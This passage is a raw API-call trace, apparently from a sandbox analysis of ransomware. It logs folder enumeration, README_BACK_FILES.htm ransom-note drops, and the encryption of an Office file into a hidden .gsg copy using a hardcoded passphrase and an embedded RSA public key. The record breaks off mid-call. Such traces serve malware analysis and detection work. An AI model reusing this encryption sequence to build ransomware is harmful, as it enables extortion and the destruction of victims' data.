returned 0 [0268.396] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0268.396] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\readme_back_files.htm")) returned 0xffffffff [0268.396] AreFileApisANSI () returned 1 [0268.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0268.397] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0268.406] GetFileType (hFile=0x5d10) returned 0x1 [0268.406] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0268.407] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0268.408] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2938378 [0268.408] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0268.408] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0268.408] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x29383f8 [0268.408] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0268.409] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0268.409] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\BackstageInAppNavCache\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7fbc0 [0268.413] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0268.413] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0268.413] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\BackstageInAppNavCache\\MyComputer\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7fc00 [0268.414] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.414] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0268.414] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0268.414] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\BackstageInAppNavCache\\MyComputer\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\backstageinappnavcache\\mycomputer\\readme_back_files.htm")) returned 0xffffffff [0268.415] AreFileApisANSI () returned 1 [0268.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f24b58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0268.415] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\BackstageInAppNavCache\\MyComputer\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\backstageinappnavcache\\mycomputer\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0268.417] GetFileType (hFile=0x5d48) returned 0x1 [0268.417] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0268.418] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0268.418] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0268.418] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\BackstageInAppNavCache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\backstageinappnavcache\\readme_back_files.htm")) returned 0xffffffff [0268.419] AreFileApisANSI () returned 1 [0268.419] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0268.419] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\BackstageInAppNavCache\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\backstageinappnavcache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0268.420] GetFileType (hFile=0x5d3c) returned 0x1 [0268.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0268.421] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0268.421] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0268.421] GetLastError () returned 0x0 [0268.421] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\excel.exe_rules.xml")) returned 0x20 [0268.422] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0268.422] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\excel.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0268.423] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\excel.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0268.424] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0268.425] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0268.426] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0268.427] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.427] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.427] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7eb80) returned 1 [0268.427] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.427] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0268.427] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f26670) returned 1 [0268.427] CryptImportPublicKeyInfo (in: hCryptProv=0x2f26670, dwCertEncodingType=0x1, pInfo=0x2f30e40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30e70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30e78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7ec80) returned 1 [0268.428] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0268.428] CryptEncrypt (in: hKey=0x2e7ec80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25c58*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f25c58*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0268.428] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f25c58*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f25c58*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0268.429] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.449] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.450] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.479] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.480] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.480] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.480] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.480] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.480] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.480] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.480] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.481] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.481] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.481] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.481] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.481] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.482] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.482] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.482] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.482] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.482] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.482] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.482] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.482] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.482] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.482] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.482] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.482] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.483] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.483] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.483] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.483] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.483] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.483] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.483] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.483] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.484] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.484] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.484] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.484] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.484] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.484] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.484] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.484] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.484] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.484] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.484] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.484] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.484] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.485] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.485] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.485] 